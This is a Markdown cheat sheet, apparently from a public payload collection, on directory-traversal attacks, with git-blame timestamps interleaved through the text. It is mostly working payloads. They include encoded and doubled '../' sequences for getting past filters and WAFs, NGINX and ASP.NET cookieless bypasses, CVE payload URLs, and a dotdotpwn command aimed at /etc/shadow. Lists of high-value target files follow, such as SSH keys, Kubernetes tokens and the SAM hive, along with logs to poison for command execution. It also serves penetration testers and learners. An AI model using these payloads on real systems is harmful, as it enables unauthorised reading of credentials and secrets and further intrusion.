2022-10-12 10:13:55 +00:00
# Directory Traversal
2018-12-27 23:27:15 +00:00
2023-10-02 10:52:10 +00:00
> Path Traversal, also known as Directory Traversal, is a type of security vulnerability that occurs when an attacker manipulates variables that reference files with “dot-dot-slash (../)” sequences or similar constructs. This can allow the attacker to access arbitrary files and directories stored on the file system.
2018-12-27 23:27:15 +00:00
## Summary
2019-06-09 14:05:44 +00:00
* [Tools ](#tools )
2018-12-27 23:27:15 +00:00
* [Basic exploitation ](#basic-exploitation )
2019-12-17 17:05:35 +00:00
* [16 bits Unicode encoding ](#16-bits-unicode-encoding )
* [UTF-8 Unicode encoding ](#utf-8-unicode-encoding )
* [Bypass "../" replaced by "" ](#bypass--replaced-by- )
* [Bypass "../" with ";" ](#bypass--with- )
* [Double URL encoding ](#double-url-encoding )
2019-07-05 16:42:42 +00:00
* [UNC Bypass ](#unc-bypass )
2020-10-04 09:42:51 +00:00
* [NGINX/ALB Bypass ](#nginxalb-bypass )
2023-09-02 21:01:10 +00:00
* [ASPNET Cookieless Bypass ](#aspnet-cookieless-bypass )
2024-05-29 21:23:51 +00:00
* [IIS Short Name ](#iis-short-name )
2018-12-27 23:27:15 +00:00
* [Path Traversal ](#path-traversal )
2019-12-17 17:05:35 +00:00
* [Interesting Linux files ](#interesting-linux-files )
* [Interesting Windows files ](#interesting-windows-files )
2019-08-18 20:24:48 +00:00
* [References ](#references )
2018-12-27 23:27:15 +00:00
2019-06-09 14:05:44 +00:00
## Tools
- [dotdotpwn - https://github.com/wireghoul/dotdotpwn ](https://github.com/wireghoul/dotdotpwn )
```powershell
git clone https://github.com/wireghoul/dotdotpwn
perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b
```
2018-12-27 23:27:15 +00:00
## Basic exploitation
We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.
```powershell
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
```
2019-07-05 16:42:42 +00:00
### 16 bits Unicode encoding
2018-12-27 23:27:15 +00:00
```powershell
. = %u002e
/ = %u2215
\ = %u2216
```
2019-07-05 16:42:42 +00:00
### UTF-8 Unicode encoding
2018-12-27 23:27:15 +00:00
```powershell
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
```
2019-07-05 16:42:42 +00:00
### Bypass "../" replaced by ""
2023-10-02 10:52:10 +00:00
Sometimes you encounter a WAF which remove the `../` characters from the strings, just duplicate them.
2018-12-27 23:27:15 +00:00
```powershell
..././
...\.\
```
2019-08-18 20:24:48 +00:00
### Bypass "../" with ";"
```powershell
..;/
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
```
2023-09-02 21:01:10 +00:00
2019-07-05 16:42:42 +00:00
### Double URL encoding
2018-12-27 23:27:15 +00:00
```powershell
. = %252e
/ = %252f
\ = %255c
```
2019-07-27 11:02:16 +00:00
**e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`
2023-09-02 21:01:10 +00:00
2019-07-05 16:42:42 +00:00
### UNC Bypass
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
```powershell
\\localhost\c$\windows\win.ini
```
2023-09-02 21:01:10 +00:00
2020-10-04 09:42:51 +00:00
### NGINX/ALB Bypass
NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
```http://nginx-server/../../``` will return a 400 bad request.
To bypass this behaviour just add forward slashes in front of the url:
```http://nginx-server////////../../```
2018-12-27 23:27:15 +00:00
2024-05-29 21:23:51 +00:00
### ASP NET Cookieless Bypass
2023-09-02 21:01:10 +00:00
When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.
For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx` . The value within `(S(...))` is the Session ID.
2024-05-29 21:23:51 +00:00
| .NET Version | URI |
| -------------- | -------------------------- |
| V1.0, V1.1 | /(XXXXXXXX)/ |
| V2.0+ | /(S(XXXXXXXX))/ |
| V2.0+ | /(A(XXXXXXXX)F(YYYYYYYY))/ |
| V2.0+ | ... |
2023-09-02 21:01:10 +00:00
We can use this behavior to bypass filtered URLs.
2024-05-29 21:23:51 +00:00
* If your application is in the main folder
```ps1
/(S(X))/
/(Y(Z))/
/(G(AAA-BBB)D(CCC=DDD)E(0-1))/
/(S(X))/admin/(S(X))/main.aspx
/(S(x))/b/(S(x))in/Navigator.dll
```
* If your application is in a subfolder
```ps1
/MyApp/(S(X))/
/admin/(S(X))/main.aspx
/admin/Foobar/(S(X))/../(S(X))/main.aspx
```
| CVE | Payload |
| -------------- | ---------------------------------------------- |
| CVE-2023-36899 | /WebForm/(S(X))/prot/(S(X))ected/target1.aspx |
| - | /WebForm/(S(X))/b/(S(X))in/target2.aspx |
| CVE-2023-36560 | /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ |
| - | /WebForm/b/(S(X))in/target2.aspx/(S(X))/ |
### IIS Short Name
* [irsdl/IIS-ShortName-Scanner ](https://github.com/irsdl/IIS-ShortName-Scanner )
```ps1
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/'
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/'
2023-09-02 21:01:10 +00:00
```
2022-03-10 10:05:17 +00:00
### Java Bypass
Bypass Java's URL protocol
```powershell
url:file:///etc/passwd
url:http://127.0.0.1:8080
```
2018-12-27 23:27:15 +00:00
## Path Traversal
2019-07-05 16:42:42 +00:00
### Interesting Linux files
2018-12-27 23:27:15 +00:00
```powershell
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
2019-07-05 16:42:42 +00:00
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
2021-09-06 18:58:44 +00:00
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
2019-07-05 16:42:42 +00:00
/var/run/secrets/kubernetes.io/serviceaccount
2019-12-26 11:09:23 +00:00
/var/lib/mlocate/mlocate.db
2023-12-01 21:21:05 +00:00
/var/lib/plocate/plocate.db
2019-12-26 11:09:23 +00:00
/var/lib/mlocate.db
2018-12-27 23:27:15 +00:00
```
2019-07-05 16:42:42 +00:00
### Interesting Windows files
2020-06-23 14:26:46 +00:00
Always existing file in recent Windows machine.
Ideal to test path traversal but nothing much interesting inside...
```powershell
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
```
2019-07-05 16:42:42 +00:00
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
2018-12-27 23:27:15 +00:00
```powershell
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
2019-10-29 08:23:39 +00:00
c:/windows/repair/sam
c:/windows/repair/system
2018-12-27 23:27:15 +00:00
```
The following log files are controllable and can be included with an evil payload to achieve a command execution
```powershell
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
2019-05-30 10:01:24 +00:00
/var/log/nginx/access.log
/var/log/nginx/error.log
2018-12-27 23:27:15 +00:00
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
```
2023-12-01 21:21:05 +00:00
2022-10-02 06:13:01 +00:00
## Labs
* [File path traversal, simple case ](https://portswigger.net/web-security/file-path-traversal/lab-simple )
* [File path traversal, traversal sequences blocked with absolute path bypass ](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass )
* [File path traversal, traversal sequences stripped non-recursively ](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively )
* [File path traversal, traversal sequences stripped with superfluous URL-decode ](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode )
* [File path traversal, validation of start of path ](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path )
* [File path traversal, validation of file extension with null byte bypass ](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass )
2018-12-27 23:27:15 +00:00
2023-12-01 21:21:05 +00:00
2018-12-27 23:27:15 +00:00
## References
2020-06-23 14:26:46 +00:00
* [Path Traversal Cheat Sheet: Windows ](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/ )
2018-12-27 23:27:15 +00:00
* [Directory traversal attack - Wikipedia ](https://en.wikipedia.org/wiki/Directory_traversal_attack )
2019-10-29 08:23:39 +00:00
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018 ](https://cwe.mitre.org/data/definitions/40.html )
2020-10-04 09:42:51 +00:00
* [NGINX may be protecting your applications from traversal attacks without you even knowing ](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381 )
2020-10-09 12:47:06 +00:00
* [Directory traversal - Portswigger ](https://portswigger.net/web-security/file-path-traversal )
2023-12-01 21:21:05 +00:00
* [Cookieless ASPNET - Soroush Dalili ](https://twitter.com/irsdl/status/1640390106312835072 )
2024-05-29 21:23:51 +00:00
* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - 30 nov. 2023 ](https://youtu.be/YlZGJ28By8U )
* [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - 06/24/2011 ](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10 ))